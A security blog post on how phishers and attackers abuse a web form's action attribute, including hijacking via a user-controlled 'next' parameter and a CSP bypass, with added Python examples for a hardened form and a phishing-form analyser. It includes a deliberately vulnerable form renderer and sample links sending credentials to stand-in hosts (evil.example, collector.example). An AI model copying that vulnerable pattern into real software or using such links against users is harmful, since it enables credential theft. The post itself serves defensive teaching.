From the title alone, I think you already know what this post is about. But first, let me take you back to the past...
The old, traditional method of filling out a form is a sheet of paper with the required fields printed on it. After writing in all the required data, we submit it through a drop box or hand it to whoever has the job of collecting it. Decades have passed, and that system still holds up today. But is it the safest way? Is it the most efficient? Does it speed up the process? Is it a better method than what we have now? Back when the internet was not yet the norm, information flowed on sheets of paper, and the easiest way to compromise that data was physical: in the simplest word, 'theft'.
Fast forward to this generation, where the internet has become a way of life and hardly anyone can live without a smartphone, a laptop or even a smartwatch. Data access has never been more convenient, and availability keeps increasing as the years go by. Critical and large data sets can now be stored in the cloud, and the risk that comes with storing data has never been higher. Every piece of information we enter is a piece that can be compromised, and every piece we share is a delight to whoever is in the business of compromising it.
The internet is a whole new universe made up of millions of web applications, each interconnected to process data and provide services. Most of these internet-facing applications sit on top of a database that holds all of the users' data. No database is fully secure once the application in front of it is exposed to the wild: data flows from the client to the web server, and nothing along that path gives you an absolute assurance of secure transport. Risk-prevention tools cannot promise 100% security, but they do lessen the risk of a customer's data being compromised.
The flow of data always originates from the user's input. Input is written into web forms, HTML forms, or simply forms. A form is the piece of paper on which you write your information, the digital perspective on a plain white sheet for the 21st century. Sure, it can't be torn into pieces, but there will always be some way for the information to leak. Once the fields are filled in, the user clicks 'Submit', and that's where the magic happens.
In this post I'd like to point out the ways attackers take advantage of this weakness and exploit it against their targets. I will also walk you through a little program I made, which will contribute to my future work.
Since web forms are the origin of every request session from the client to the web server, they are among the largest threat vectors in a web application, and attackers take advantage of that. Often with the aid of an initial attack on the site's infrastructure (e.g. DNS hijacking), an attacker replicates a legitimate e-commerce website and redirects the user's form input to a malicious server under their control. This normally happens in phishing: the attacker sends out spam mail containing malicious links, and the links' goal is to trick the user into providing critical information (bank account details, TIN, account-related data and the like) using the classic social engineering techniques.
We all know that the action attribute of the form tag holds the URL where the user's data is sent, and where the browser navigates, once the user clicks the submit button. Below are some known weaknesses involving the form's action attribute:
* Phishing - The action attribute, which specifies the URL where the user-submitted information is sent, is controlled by user-supplied input. An attacker can exploit this flaw by crafting a malicious link whose form action URL looks almost the same as the legitimate website's, and distributing that link to the users in the organization in the form of a phishing mail.
* Bypassing CSP form-action with reflected XSS - I recently read a blog post from Detectify Labs where the author walked through how he bypassed the Content-Security-Policy (CSP) form-action directive with XSS/HTML injection in both Chrome and Firefox. By injecting markup he overrode the form's values, switching the method to 'get', so that once the user clicked the submit button the victim was sent to the attacker's website despite the form-action restriction. You can read the full article at https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-reflected-xss/.
* Form action hijacking - An attacker constructs a URL that modifies the action URL of a form so that it points to the attacker's server. The entire form content, including CSRF tokens, user-entered parameter values and everything else in the form, is then delivered to the attacker via the hijacked action URL.
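To make the "action controlled by user input" and "form action hijacking" items concrete, here is an added example (not code from this post or from any real application) of a login form whose action is filled from an untrusted "next" parameter, shown as the vulnerable version beside a hardened one. The site host name, the parameter name and the rendering functions are assumptions made for the illustration.

```python
# Added example, not the author's code: the "form action hijacking" pattern
# above, as a vulnerable rendering function beside a hardened one. The
# application, its host name (SITE_HOST) and the "next" parameter are
# assumptions made for the illustration, not taken from any real site.
import html
from urllib.parse import urlsplit

SITE_HOST = "shop.example"   # assumed host of the legitimate application


def render_login_form_vulnerable(next_url: str) -> str:
    """VULNERABLE: a request parameter (say ?next=...) is copied straight into
    the form's action. A link like /login?next=https://evil.example/collect
    makes the browser POST the username, password and CSRF token to the
    attacker's server instead of the site."""
    return ('<form method="post" action="%s">'
            '<input type="hidden" name="csrf" value="t0k3n">'
            '<input name="user"><input name="pass" type="password">'
            '<input type="submit"></form>' % next_url)


def safe_form_action(next_url: str, default: str = "/login") -> str:
    """Reduce an untrusted 'next' value to a path on this site, or fall back
    to `default`. Rejects other hosts, protocol-relative URLs (//evil.example),
    backslash variants, user@host tricks and non-http schemes (javascript:)."""
    # Browsers strip tab/CR/LF from URLs and commonly treat '\' as '/', so
    # normalise the same way before looking at the value.
    candidate = "".join(c for c in next_url.strip() if c not in "\t\r\n")
    candidate = candidate.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # absolute URL: only accept http(s) on exactly our own host
        if parts.scheme not in ("http", "https") or parts.netloc.lower() != SITE_HOST:
            return default
    elif candidate.startswith("//") or not candidate.startswith("/"):
        # "//host", "///host" are protocol-relative; "account" is ambiguous
        return default
    # Re-serialise as a site-local path so the host can never be attacker-chosen.
    path = parts.path or "/"
    if path.startswith("//"):      # https://shop.example//evil.example
        return default
    if parts.query:
        path += "?" + parts.query
    return path


def render_login_form_safe(next_url: str) -> str:
    """HARDENED: action is restricted to a same-site path and attribute-escaped."""
    action = html.escape(safe_form_action(next_url), quote=True)
    return ('<form method="post" action="%s">'
            '<input type="hidden" name="csrf" value="t0k3n">'
            '<input name="user"><input name="pass" type="password">'
            '<input type="submit"></form>' % action)


if __name__ == "__main__":
    for value in ("https://evil.example/collect", "//evil.example/x",
                  "javascript:alert(1)", "/account/settings?tab=2"):
        print(value, "->", safe_form_action(value))
```

The hardened version deliberately throws away the scheme and host even when they match, so the only thing an attacker can still choose is a path on the legitimate site; an allow-list of paths would tighten it further.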
With all those attacks mentioned, how can we protect ourselves from them? Simple: check the values that end up in the form action. How?
Say you work in cybersecurity and a client hands you a sample phishing mail containing a URL you have already validated as malicious. If you want to investigate further, where do you go from there?
1. Launch your VM or test environment and open the suspicious site there.
2. Right-click on the page's form and choose Inspect Element.
3. Look for the form tag and note the URL value in its action attribute.
4. Validate whether that URL is malicious with your favourite URL checker.
Four simple steps. Easy, but they still cost you a minute or more each time. I have written a tool that performs those steps for you. All you need is the URL of the suspected malicious site. Assuming the site is a phishing site, the output is:
1. The URL redirection taken from the value of every form action found on the site.
2. A highlight of the login form, and the page to which the data is sent once the user clicks the submit button.
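The manual steps and the tool's output both come down to the same check: find every form on the page, resolve where it submits, and see whether that target belongs to the host you are looking at. The following added example (my own illustration, not the author's tool) does that over a page's HTML with only the standard library; the page URL, host names and HTML are constructed for the example. It also catches a formaction attribute on a submit button, which silently replaces the form's action and is easy to miss when reading the form tag alone.

```python
# Added example, not the author's tool: inspect every <form> on a page the way
# steps 1-4 above do by hand, and report where each form (and especially the
# login form) will send its data. The page URL and HTML below are constructed
# for the example; the host names in them are made up.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect each <form> with its resolved action, method, named inputs,
    whether it has a password field, and any formaction overrides on buttons."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            # An empty or missing action means "submit to the page's own URL".
            self._current = {
                "action": urljoin(self.page_url, a.get("action", "")),
                "method": a.get("method", "get").lower() or "get",
                "inputs": [],
                "has_password": False,
                "overrides": [],
            }
            self.forms.append(self._current)
            return
        if self._current is None:
            return
        if tag == "input":
            if a.get("name"):
                self._current["inputs"].append(a["name"])
            if a.get("type", "text").lower() == "password":
                self._current["has_password"] = True
        if tag in ("input", "button") and a.get("formaction"):
            # A submit control's formaction replaces the form's action.
            self._current["overrides"].append(urljoin(self.page_url, a["formaction"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyze_forms(page_url, html_text):
    """Return one record per submission target: where the data goes, whether
    that host differs from the page's host, and whether it is a login form."""
    parser = FormCollector(page_url)
    parser.feed(html_text)
    page_host = (urlsplit(page_url).hostname or "").lower()
    report = []
    for f in parser.forms:
        for target in [f["action"]] + f["overrides"]:
            t = urlsplit(target)
            report.append({
                "target": target,
                "method": f["method"],
                "inputs": f["inputs"],
                "login_form": f["has_password"],
                "external": (t.hostname or "").lower() != page_host,
                "plaintext": t.scheme == "http",   # credentials sent unencrypted
            })
    return report


SAMPLE_PAGE_URL = "http://secure-login-update.example/bofa/index.html"   # constructed
SAMPLE_HTML = """
<html><body>
<form method="get" action="/search">
  <input name="q"><input type="submit" value="Search">
</form>
<form method="POST" action="http://collector.example/post.php">
  <input name="onlineid">
  <input name="passcode" type="password">
  <input type="hidden" name="csrf" value="abc123">
  <button type="submit" formaction="http://collector.example/alt.php">Sign In</button>
</form>
</body></html>
"""   # constructed phishing-style page, not a real one


def main():
    for r in analyze_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        flag = "LOGIN" if r["login_form"] else "     "
        where = "EXTERNAL" if r["external"] else "same-host"
        print(f"{flag} {r['method'].upper():4} -> {r['target']}  [{where}]  fields={r['inputs']}")


if __name__ == "__main__":
    main()
```

Two caveats a practitioner should keep in mind. This only sees the static HTML: a script can set the form's action at submit time, so the DOM you inspect in the VM may differ from the raw source. And many phishing kits post to a script on the same attacker-controlled host, so an "external" flag is evidence of hijacking, while its absence proves nothing; the decisive comparison is the page's host against the brand's real host.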
RUN
Let's run the program and see what it can do...
* On a legitimate site, let's say the real (non-phish) Facebook login, the output must look like the one below
* From a known phishing site...
* Phishing in a banking scenario...
Take a look at the legitimate Bank of America website.
Now take a look at the phishing site...
If the user is not security-aware or not trained to deal with this sort of thing, they could easily enter their information on the rogue site.
Running the program, here's the difference:
Phish site
Legit Site
With proper training and awareness of phishing and social engineering, one can protect and secure one's own assets. Organizations that own a web application must regularly secure their perimeter. Developers must properly sanitize their input, and they must thoroughly examine and validate their application before launching it live. Bottom line is...
Careless data field>>results>> exploitable output
Which side are you on?
<krontek> halt
References and Special Thanks to:
(a) https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-reflected-xss/
(b) The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws, 2nd Edition; Dafydd Stuttard and Marcus Pinto